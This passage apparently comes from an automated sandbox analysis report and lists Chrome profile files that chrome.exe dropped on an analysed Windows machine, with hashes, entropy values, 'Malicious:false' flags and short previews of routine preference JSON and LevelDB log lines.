                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\5ffecbc7-f9d0-4765-9d05-d84937d0bf6a.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):97460
                                                                                                                                                Entropy (8bit):3.7500740509204293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:sK34dqKZGMX8OPsvvV4+lENtrevx73CV7+Hv6GOxrcfVhxCrD/SrApm4Mqcb1Flm:T346K+59CXIOge7tD3Q3rG/KxPNTw
                                                                                                                                                MD5:6A8E3D13A5556A0CF18EE6B5E948051D
                                                                                                                                                SHA1:57301E22657F904D0F48AF9035004AB24AADAA66
                                                                                                                                                SHA-256:6D838678FA265E00EBDC97F464EC7201EF556914FC2D690088E0B59BC5D7FBC3
                                                                                                                                                SHA-512:AC6DBB5D4797D30B8191ED7329D46B537BA459E620468650E521D48FDE5DE62DB0DB3EC8D962E0C2C82DB19730A0BE25918BC0AB8B120DC2985C510D635A3DF6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .|..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....I8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\8ed402ed-9f0d-4bfa-a526-42c4e63459a4.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780431502545
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hgLLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:mLLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:C6253FD173F227E4E7F1D3EE08B8F6E0
                                                                                                                                                SHA1:E47BBBFAEE3A8AB40D874B80A6567A1F29919548
                                                                                                                                                SHA-256:75D32CFD112422BB63CB13795D6E93350D085BB509A1DD2E380B202F2A9C32E7
                                                                                                                                                SHA-512:DC5CD4C2B983686ECF7DCD5A0AB3624AA95F59868B2D2CA23DC983D50576556090AEB3733F6BCA0D50C0962B64A7659321E4BA6055ADE9EE910BDEF0E8484B72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40
                                                                                                                                                Entropy (8bit):3.254162526001658
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:FkXft0xE1n:+ftIE1n
                                                                                                                                                MD5:BD4642AD6C750A12D912B20BCB92E14D
                                                                                                                                                SHA1:C549F0F48FDD4FBC62E51AC26D7E185160CE2123
                                                                                                                                                SHA-256:4FD71FE78DFE203137C89C9FB0734358FF432F2BC83338112DC7B830F9B30F2C
                                                                                                                                                SHA-512:04410D12EF327614C3AF1251C9906BFEB2977211A7F53CBB08A8C01F9465A382CD001E51AB936A0D196D359F1DECDDAEAF5E7D1DBD49CE5F4FF91BF5C332B6CF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: sdPC....................s}.....M..2.!..%
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\01ab4a26-c84a-4892-a73a-1a76565e8bda.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5193
                                                                                                                                                Entropy (8bit):4.979900818343623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n8pCFcqX9pcKI1Vok0JCKL8aPQkNNMkZpbOTQVuwn:n8pCFF9pcj04Kukv/
                                                                                                                                                MD5:F40CC1605A6D5FAD4929C5FEFF714C6B
                                                                                                                                                SHA1:0D4E880D4BDD0DDF03591242FF448FF9ACB60719
                                                                                                                                                SHA-256:C70C793088B14C73D04D05D4518B31C5734DF395AA4062D5D07F8E4CD1412D51
                                                                                                                                                SHA-512:DB058CD1700DAB2993DAC4A4D94E0AABE937A0D43E190C4211F4A6A21D5136AB5B1389A19D71C91EBA86915869739D1B76EF7E4E7101327E5603C1EA1142EC72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13280015426034104","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\5f710deb-912f-40ef-aec8-6dfa68ef8525.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5193
                                                                                                                                                Entropy (8bit):4.978422207122921
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n8pCFc5I9pcKI1fok0JCKL8aTkjumbOTQVuwn:n8pCF/9pcja4KJkjL
                                                                                                                                                MD5:EE0754416F54375288C9950DAF72542A
                                                                                                                                                SHA1:F7EC603343910D680E0A9EE4416F3DF982F79598
                                                                                                                                                SHA-256:E148266E52AE28915E86890469C01CE201183E6991823382AB0A0FE6681550BA
                                                                                                                                                SHA-512:74DE81A3F44347423BF756953DF5DD52C4809EA29B7D745541C427131C08D03BE7AB7F200064F56E02557064EE848BD3A27EDE2D7A8A55A1679F00E7374D8E20
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13280015426034104","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\7d92133c-777e-4084-a984-5737bc2935d0.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16745
                                                                                                                                                Entropy (8bit):5.57736597591648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:/cTtwLlG7Xk1kXqKf/pUZNCgVLH2HfDPrUdDLo4K:hLlAk1kXqKf/pUZNCgVLH2HfrrUBod
                                                                                                                                                MD5:C07E3F5EA2C2CC872B66432A983028A6
                                                                                                                                                SHA1:C5F107707761B9BCACF3F055267CC3FCB303312F
                                                                                                                                                SHA-256:5578698169AD8171E228B57F50FE7280EEBFE7E4896CC935AAEAFC16B8EB017C
                                                                                                                                                SHA-512:B59897A29DAD3A1BCB192CB8489825B9532D553C5820256AAA25EFE9B53CF5FFA5423AA0098EFE22C5CEB308A874CE858FAE08CFAB9213A24FB9B52D95C713C2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13280015424813965","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):331
                                                                                                                                                Entropy (8bit):5.2131284716711255
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRmdVOq2PWXp+N23iKKdK9RXXTZIFUtnEeRmdjXZmwBEeRmdQDkwOWXp+N23/:pv+Ova5Kk7XT2FUtnvq/Bv15f5Kk7XVJ
                                                                                                                                                MD5:24E9100145747BAA4C3889A9C5C206DB
                                                                                                                                                SHA1:0BB53B2828C801DA97F3BE448D10AFF8D9FB521D
                                                                                                                                                SHA-256:E9F670384287EAAC2342064D0B8264965BC55F9929700AD54D688A664D172BCC
                                                                                                                                                SHA-512:FC6F76775DA866E3C19147610B2BB0212899988DBC3C7B833EAF7CE962522402EBC8DFD142D6885AE196EC38BC8F69F2119BB5F59899094BB808CC0EBF39D983
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.182 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/10/29-14:10:44.184 8f4 Recovering log #3.2021/10/29-14:10:44.185 8f4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old+. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):331
                                                                                                                                                Entropy (8bit):5.2131284716711255
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRmdVOq2PWXp+N23iKKdK9RXXTZIFUtnEeRmdjXZmwBEeRmdQDkwOWXp+N23/:pv+Ova5Kk7XT2FUtnvq/Bv15f5Kk7XVJ
                                                                                                                                                MD5:24E9100145747BAA4C3889A9C5C206DB
                                                                                                                                                SHA1:0BB53B2828C801DA97F3BE448D10AFF8D9FB521D
                                                                                                                                                SHA-256:E9F670384287EAAC2342064D0B8264965BC55F9929700AD54D688A664D172BCC
                                                                                                                                                SHA-512:FC6F76775DA866E3C19147610B2BB0212899988DBC3C7B833EAF7CE962522402EBC8DFD142D6885AE196EC38BC8F69F2119BB5F59899094BB808CC0EBF39D983
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.182 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/10/29-14:10:44.184 8f4 Recovering log #3.2021/10/29-14:10:44.185 8f4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):315
                                                                                                                                                Entropy (8bit):5.217993576664083
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRm/4q2PWXp+N23iKKdKyDZIFUtnEeRmbZmwBEeRmKFkwOWXp+N23iKKdKyJd:pvLva5Kk02FUtnv4/BvnF5f5KkWJ
                                                                                                                                                MD5:FB49EA72F90C78269BF908408C05B028
                                                                                                                                                SHA1:C9A4A332D07F5E787841B0EAD9DCB6E0EBFB0F08
                                                                                                                                                SHA-256:1C9C62B45107367F1CB20F9AE47E8C4C097D314E3726F12E0FE94AD74BFAC518
                                                                                                                                                SHA-512:251C941212BCD389FE22885345A372F658DEE245AD8F0023FE8AD5350CA75111FD45E5DEABB668D8146C88C7CD81BFE44C8E109FB49DD06E9402C72C1EBB15D9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.113 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/10/29-14:10:44.177 8f4 Recovering log #3.2021/10/29-14:10:44.178 8f4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old.. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):315
                                                                                                                                                Entropy (8bit):5.217993576664083
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRm/4q2PWXp+N23iKKdKyDZIFUtnEeRmbZmwBEeRmKFkwOWXp+N23iKKdKyJd:pvLva5Kk02FUtnv4/BvnF5f5KkWJ
                                                                                                                                                MD5:FB49EA72F90C78269BF908408C05B028
                                                                                                                                                SHA1:C9A4A332D07F5E787841B0EAD9DCB6E0EBFB0F08
                                                                                                                                                SHA-256:1C9C62B45107367F1CB20F9AE47E8C4C097D314E3726F12E0FE94AD74BFAC518
                                                                                                                                                SHA-512:251C941212BCD389FE22885345A372F658DEE245AD8F0023FE8AD5350CA75111FD45E5DEABB668D8146C88C7CD81BFE44C8E109FB49DD06E9402C72C1EBB15D9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.113 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/10/29-14:10:44.177 8f4 Recovering log #3.2021/10/29-14:10:44.178 8f4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13448
                                                                                                                                                Entropy (8bit):3.496787945228552
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:34gHv2EhZk9Sly2gLThZk9Q78l4I2gLhhZk9Q78lwg8R2pLchZxo7plWK2pLEhZG:3HnE/DC9PNWStdSG
                                                                                                                                                MD5:C9C2061CD45FF26018679E016E8F308F
                                                                                                                                                SHA1:775E768E6E959030005BB9C5766B013037878423
                                                                                                                                                SHA-256:E1C44F7A439CDBFF47343B478E2DA39FB8C4BFE73D16420BA5A59EAD5F6166E8
                                                                                                                                                SHA-512:D844220BA9297BE2B1DA3673B058AA466EDB386EDEC17B721586B8DC4FB3CA7D0ED65BE9123FF2290CE4E96E74E0D0FF8C1EA02A81701634F3A1C03EB9E1A0A7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SNSS....................................................!.............................................1..,.......$...4325d4a0_5254_4d0f_a259_2eb450f69d61......................%...................................................................................5..0.......&...{AE32626E-B2F7-4664-89C4-2B2C2DB60905}........................!.............................................1..,.......$...2d3ff34f_df6a_4e93_8e40_05f7b18759b4......................y.....................................https://docs.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0......................................................h.......`.......................................................h..A....i..A............(...............................l.......h.t.t.p.s.:././.d.o.c.s...m.i.c.r.o.s.o.f.t...c.o.m./.e.n.-.u.s./.d.o.t.n.e.t./.f.r.a.m.e.w.o.r.k./.i.n.s.t.a.l.l./.a.p.p.l.i.c.a.t.i.o.n.-.n.o.t.-
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1368
                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWe:
                                                                                                                                                MD5:6C88FEEDEE47B405DCBB87ABEBC47027
                                                                                                                                                SHA1:C28B0EB68BAB44D7D6F514351A3BDFCD70A3941E
                                                                                                                                                SHA-256:153DDD24CD5DBCA43DC2071DDF4BE156DCBF32FB3338A2815023358A9740F708
                                                                                                                                                SHA-512:A78C7A534278ADF5D741C721D7109E0E421C3C43EF0E3E4265E9A9BA9AECD8E1FC14268183CE5CCA79523D1B1554AA29E708DF54023720D37929658359E242AE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):317
                                                                                                                                                Entropy (8bit):5.232662299260004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeXSmSVq2PWXp+N23iKKdK8NIFUtnEeXSYgZmwBEeXSzIkwOWXp+N23iKKdK8n:pvXSJVva5KkpFUtnvXSYg/BvXSzI5f5c
                                                                                                                                                MD5:E2040ED7DBD41A2D5AF72A9C334618CF
                                                                                                                                                SHA1:9628732D47A6E8B609562DA46C55E4DC820C891B
                                                                                                                                                SHA-256:CE2B8B548F018AEDDFD13EB20D76923E2D715239452D5ABC3B882C59C4D12DC3
                                                                                                                                                SHA-512:18DFC5AB6DBBEC50D6E19865103D8E65A31F315AF62B80A6353BAC950180721A52FA7D5D2F533F6C80C146F825313458C7367EF140477DC3A748094BFDA3DD59
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:27.505 8e4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/10/29-14:10:27.506 8e4 Recovering log #3.2021/10/29-14:10:27.507 8e4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):317
                                                                                                                                                Entropy (8bit):5.232662299260004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeXSmSVq2PWXp+N23iKKdK8NIFUtnEeXSYgZmwBEeXSzIkwOWXp+N23iKKdK8n:pvXSJVva5KkpFUtnvXSYg/BvXSzI5f5c
                                                                                                                                                MD5:E2040ED7DBD41A2D5AF72A9C334618CF
                                                                                                                                                SHA1:9628732D47A6E8B609562DA46C55E4DC820C891B
                                                                                                                                                SHA-256:CE2B8B548F018AEDDFD13EB20D76923E2D715239452D5ABC3B882C59C4D12DC3
                                                                                                                                                SHA-512:18DFC5AB6DBBEC50D6E19865103D8E65A31F315AF62B80A6353BAC950180721A52FA7D5D2F533F6C80C146F825313458C7367EF140477DC3A748094BFDA3DD59
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:27.505 8e4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/10/29-14:10:27.506 8e4 Recovering log #3.2021/10/29-14:10:27.507 8e4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):38
                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:FQxlXNQxlX:qTCT
                                                                                                                                                MD5:51A2CBB807F5085530DEC18E45CB8569
                                                                                                                                                SHA1:7AD88CD3DE5844C7FC269C4500228A630016AB5B
                                                                                                                                                SHA-256:1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
                                                                                                                                                SHA-512:B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .f.5................f.5...............
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):372
                                                                                                                                                Entropy (8bit):5.259827089317539
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRWvUf4q2PWXp+N23iKKdK25+Xqx8chI+IFUtnEeRWlJZmwBEeRWlDkwOWXpi:pvv4va5KkTXfchI3FUtnvkJ/BvkD5f5G
                                                                                                                                                MD5:647AC9965A71591C224C5EFF662A5EC4
                                                                                                                                                SHA1:566B28A50B3159789A62B811842500274A9D3611
                                                                                                                                                SHA-256:AD79970F9BECA6486DDEBB9AEDD6139F616433DF2B6A39DAEA4C559CF6AFF6EA
                                                                                                                                                SHA-512:29F8F13DBF8D7AB3E51C39A390866C7B5728B7FBD12E275ED27679D8536205292A974DD368FDD690D59003DDCF2A52EF343865D0F53B49FCA6DBED8DA4A0A82B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:43.804 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/10/29-14:10:43.805 1f24 Recovering log #3.2021/10/29-14:10:43.805 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):372
                                                                                                                                                Entropy (8bit):5.259827089317539
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRWvUf4q2PWXp+N23iKKdK25+Xqx8chI+IFUtnEeRWlJZmwBEeRWlDkwOWXpi:pvv4va5KkTXfchI3FUtnvkJ/BvkD5f5G
